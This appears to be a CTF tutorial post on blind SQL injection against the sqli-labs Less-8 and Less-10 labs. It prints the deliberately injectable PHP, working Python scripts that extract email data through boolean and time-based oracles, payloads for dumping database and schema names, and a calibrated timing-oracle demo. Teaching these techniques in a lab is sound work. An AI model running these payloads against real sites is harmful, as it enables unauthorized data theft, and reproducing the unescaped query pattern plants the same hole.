Boolean / time-based blind
in PENETRATIONCTF with 0 comment

[Blind injection]

【boolean-based-blind】: boolean-based blind injection

The page never shows query results; it only behaves differently depending on whether the injected condition was true or false, and that difference is enough to read data out one character at a time.


【String truncation functions commonly used in blind injection】

1. substring(str, pos, len): returns len characters of str starting at position pos (positions are 1-based)

2. mid(str, pos, len): a synonym for substring() in MySQL

3. left(str, len): returns the leftmost len characters of str

【Blind injection code】

<?php
// sqli-labs Less-8 (excerpt; the opening if/else restored so the braces balance).
// Uses the old mysql_* API: the id parameter goes straight into the query text.
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // injectable: no escaping, no parameter binding
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font size="5" color="#FFFF00">';
      echo 'You are in...........';   // the only signal an attacker gets: a row matched
      echo "<br>";
      echo $sql."<br>";
        echo "</font>";
      }
    else
    {
    // nothing is printed in this branch, so a false condition yields a different page
    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

【Exploit script】

# Fetch the email_id of the row with id 2. Note that the injected query runs
# against the users table; the emails table is reached through a subquery.
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import requests

url = "http://127.0.0.1/sqli/Less-8/?id=5"
# candidate characters; '.' and '_' added so addresses such as x.y@host.com resolve
data = "1234567890abcdefghijklmnopqrstuvwxyz@._ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# %23 is a URL-encoded '#', which comments out the rest of the original query
payload = "' and ascii(substring((select email_id from emails where id =2),{0},1)) = {1} %23"

email = ""
for i in range(1, 32):
    found = False
    for j in data:
        j = ord(j)
        exp = url + payload.format(i, j)
        res = requests.get(exp)
        if "You are in" in res.text:   # the page differs only when the condition held
            email += chr(j)
            found = True
            print(email)
            break                      # move to the next position
    if not found:                      # no candidate matched: end of the string
        break
print("email_id:", email)

Likewise, the payload for the current database name can be written as:
' and ascii(substr(database(),{0},1)) = {1} %23
and the payload for listing all databases (one schema per limit offset) as:
' and ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),{0},1)) = {1} %23

【time-based-blind】

Time-based blind injection is really another form of the boolean kind; only the thing being measured changes, from the page content to the response time.

【Case】

sqli-labs Less-10

// sqli-labs Less-10 (excerpt): id is wrapped in double quotes, so the payload
// must close with a double quote, but it is still concatenated unescaped.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font size="5" color="#FFFF00">';
      echo 'You are in...........';
      echo "<br>";
        echo "</font>";
      }
    else
    {
    // same text in both branches: the page content no longer leaks anything
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }

As you can see, whatever parameter value is supplied the same page comes back ("You are in..."). Without careful testing this looks as if there were no injection at all, so time is brought in as the signal. With the payload
http://127.0.0.1/sqli/Less-10/?id=3" and sleep(4) --+
the response is delayed by 4 s, and from here a script can take over.

#!/usr/bin/env python3
#_*_ coding:utf-8_*_

import requests
import time

url = "http://127.0.0.1/sqli/Less-10/?id=3"
# Less-10 wraps id in double quotes, so the payload closes with " and the
# condition sits inside if(): the server only sleeps when the guess matches.
exp = "\" and if(ord(substr((select email_id from emails where id = 3),{0},1))={1},sleep(3),0) --+"
# candidate characters; '.' and '_' added so addresses such as x.y@host.com resolve
payloads = "1234567890abcdefghijklmnopqrstuvwxyz@._ABCDEFGHIJKLMNOPQRSTUVWXYZ"

user = ""
for i in range(1, 32):
    found = False
    for payload in payloads:
        payload = ord(payload)
        startTime = time.time()
        urls = url + exp.format(i, payload)
        #print(urls)
        res = requests.get(urls)
        if time.time() - startTime > 3:   # only a matching guess triggers sleep(3)
            user += chr(payload)
            found = True
            print(user)
            break
    if not found:                          # nothing matched: end of the string
        break
print("email_id:", user)

【Functions commonly used in blind injection】
1. sleep(int)
As the name says: pauses the query for the number of seconds you specify.
2. IF(expr1,expr2,expr3)
expr1 is the condition; expr2 is returned when it is true and expr3 when it is false,
e.g. if(substr(user(),1,1)='r',sleep(5),0)
If the first character of user() is 'r' the query is delayed by 5 s, otherwise it returns 0.
3. find_in_set()
find_in_set(str,strlist) returns the 1-based position of str in the comma-separated list strlist (1 to N for a list of N substrings), or 0 when str is not in the list.
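The functions above only become useful once the response time is turned into a reliable yes/no answer. The following added example (not the post's or sqli-labs' code) builds that timing oracle: it registers a real sleep() inside an in-memory sqlite3 stand-in for Less-10, calibrates the baseline latency on a condition that is known to be false, and then binary-searches the length of the target string so only the "true" requests pay the delay. Assumptions: constructed table contents and a single-quoted id (Less-10's double quotes only change the closing character of the payload); sqlite has no IF(), so MySQL's if(c,sleep(n),0) is written as CASE WHEN, which MySQL accepts as well; DELAY is 0.2 s to keep the run short where the post's payload used sleep(3).

```python
import sqlite3
import time

SECRET_EMAIL = "angel@example.com"   # constructed value, not real sqli-labs data
DELAY = 0.2                          # seconds; the post's payload used sleep(3)


def make_less10():
    """In-memory stand-in for Less-10 (assumption: sqlite3 instead of MySQL).
    A real sleep() is registered so the injected payload actually stalls."""
    con = sqlite3.connect(":memory:")
    con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    con.executescript(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT);"
        "CREATE TABLE emails (id INTEGER, email_id TEXT);"
        "INSERT INTO users VALUES (3, 'Dummy', 'p@ssword');"
    )
    con.execute("INSERT INTO emails VALUES (3, ?)", (SECRET_EMAIL,))
    return con


def page(con, id_param):
    """Like the Less-10 PHP: the response is the same whether or not a row
    matched, so only the elapsed time carries information."""
    con.execute(f"SELECT * FROM users WHERE id='{id_param}' LIMIT 0,1").fetchone()
    return "You are in..........."


def timed_request(con, cond):
    """Send one payload and return the elapsed seconds. MySQL's
    if(cond, sleep(n), 0) is written as CASE WHEN because sqlite has no IF();
    MySQL accepts this spelling too."""
    payload = f"3' AND CASE WHEN ({cond}) THEN sleep({DELAY}) ELSE 0 END -- "
    start = time.perf_counter()
    page(con, payload)
    return time.perf_counter() - start


def make_oracle(con, samples=3):
    """Calibrate on a condition known to be false, then count a request as a
    hit only when it exceeds baseline + DELAY/2, so ordinary jitter is not
    mistaken for sleep()."""
    baseline = min(timed_request(con, "1=0") for _ in range(samples))
    threshold = baseline + DELAY / 2
    return lambda cond: timed_request(con, cond) >= threshold


def string_length(oracle, subquery, max_len=64):
    """Binary-search length((subquery)): about log2(max_len) requests, and only
    the 'true' ones pay the DELAY, instead of one request per candidate length."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def demo():
    """Length of emails.email_id for id 3, learned purely from response time."""
    oracle = make_oracle(make_less10())
    return string_length(oracle, "select email_id from emails where id = 3")


if __name__ == "__main__":
    print("email_id length:", demo())
```

Against a real server the same oracle is reused for the per-character search; the calibration step matters there because network latency, not the database, dominates the baseline, and the `> 3` comparison in the script above has no margin when sleep(3) is exactly 3 s.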
